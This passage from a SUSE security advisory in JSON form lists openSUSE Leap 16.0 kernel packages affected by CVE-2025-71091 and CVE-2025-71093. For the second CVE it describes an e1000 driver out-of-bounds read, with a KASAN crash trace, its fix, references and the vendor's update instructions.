"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71091"
},
{
"cve": "CVE-2025-71093",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71093"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ne1000: fix OOB in e1000_tbi_should_accept()\n\nIn e1000_tbi_should_accept() we read the last byte of the frame via\n\u0027data[length - 1]\u0027 to evaluate the TBI workaround. If the descriptor-\nreported length is zero or larger than the actual RX buffer size, this\nread goes out of bounds and can hit unrelated slab objects. The issue\nis observed from the NAPI receive path (e1000_clean_rx_irq):\n\n==================================================================\nBUG: KASAN: slab-out-of-bounds in e1000_tbi_should_accept+0x610/0x790\nRead of size 1 at addr ffff888014114e54 by task sshd/363\n\nCPU: 0 PID: 363 Comm: sshd Not tainted 5.18.0-rc1 #1\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014\nCall Trace:\n \u003cIRQ\u003e\n dump_stack_lvl+0x5a/0x74\n print_address_description+0x7b/0x440\n print_report+0x101/0x200\n kasan_report+0xc1/0xf0\n e1000_tbi_should_accept+0x610/0x790\n e1000_clean_rx_irq+0xa8c/0x1110\n e1000_clean+0xde2/0x3c10\n __napi_poll+0x98/0x380\n net_rx_action+0x491/0xa20\n __do_softirq+0x2c9/0x61d\n do_softirq+0xd1/0x120\n \u003c/IRQ\u003e\n \u003cTASK\u003e\n __local_bh_enable_ip+0xfe/0x130\n ip_finish_output2+0x7d5/0xb00\n __ip_queue_xmit+0xe24/0x1ab0\n __tcp_transmit_skb+0x1bcb/0x3340\n tcp_write_xmit+0x175d/0x6bd0\n __tcp_push_pending_frames+0x7b/0x280\n tcp_sendmsg_locked+0x2e4f/0x32d0\n tcp_sendmsg+0x24/0x40\n sock_write_iter+0x322/0x430\n vfs_write+0x56c/0xa60\n ksys_write+0xd1/0x190\n do_syscall_64+0x43/0x90\n entry_SYSCALL_64_after_hwframe+0x44/0xae\nRIP: 0033:0x7f511b476b10\nCode: 73 01 c3 48 8b 0d 88 d3 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 0f 1f 44 00 00 83 3d f9 2b 2c 00 00 75 10 b8 01 00 00 00 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 8e 9b 01 00 48 89 04 24\nRSP: 002b:00007ffc9211d4e8 EFLAGS: 00000246 ORIG_RAX: 0000000000000001\nRAX: ffffffffffffffda RBX: 0000000000004024 RCX: 00007f511b476b10\nRDX: 0000000000004024 RSI: 0000559a9385962c RDI: 0000000000000003\nRBP: 0000559a9383a400 R08: fffffffffffffff0 R09: 0000000000004f00\nR10: 0000000000000070 R11: 0000000000000246 R12: 0000000000000000\nR13: 00007ffc9211d57f R14: 0000559a9347bde7 R15: 0000000000000003\n \u003c/TASK\u003e\nAllocated by task 1:\n __kasan_krealloc+0x131/0x1c0\n krealloc+0x90/0xc0\n add_sysfs_param+0xcb/0x8a0\n kernel_add_sysfs_param+0x81/0xd4\n param_sysfs_builtin+0x138/0x1a6\n param_sysfs_init+0x57/0x5b\n do_one_initcall+0x104/0x250\n do_initcall_level+0x102/0x132\n do_initcalls+0x46/0x74\n kernel_init_freeable+0x28f/0x393\n kernel_init+0x14/0x1a0\n ret_from_fork+0x22/0x30\nThe buggy address belongs to the object at ffff888014114000\n which belongs to the cache kmalloc-2k of size 2048\nThe buggy address is located 1620 bytes to the right of\n 2048-byte region [ffff888014114000, ffff888014114800]\nThe buggy address belongs to the physical page:\npage:ffffea0000504400 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x14110\nhead:ffffea0000504400 order:3 compound_mapcount:0 compound_pincount:0\nflags: 0x100000000010200(slab|head|node=0|zone=1)\nraw: 0100000000010200 0000000000000000 dead000000000001 ffff888013442000\nraw: 0000000000000000 0000000000080008 00000001ffffffff 0000000000000000\npage dumped because: kasan: bad access detected\n==================================================================\n\nThis happens because the TBI check unconditionally dereferences the last\nbyte without validating the reported length first:\n\n\tu8 last_byte = *(data + length - 1);\n\nFix by rejecting the frame early if the length is zero, or if it exceeds\nadapter-\u003erx_buffer_len. This preserves the TBI workaround semantics for\nvalid frames and prevents touching memory beyond the RX buffer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71093",
"url": "https://www.suse.com/security/cve/CVE-2025-71093"
},
{
"category": "external",
"summary": "SUSE Bug 1256777 for CVE-2025-71093",
"url": "https://bugzilla.suse.com/1256777"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
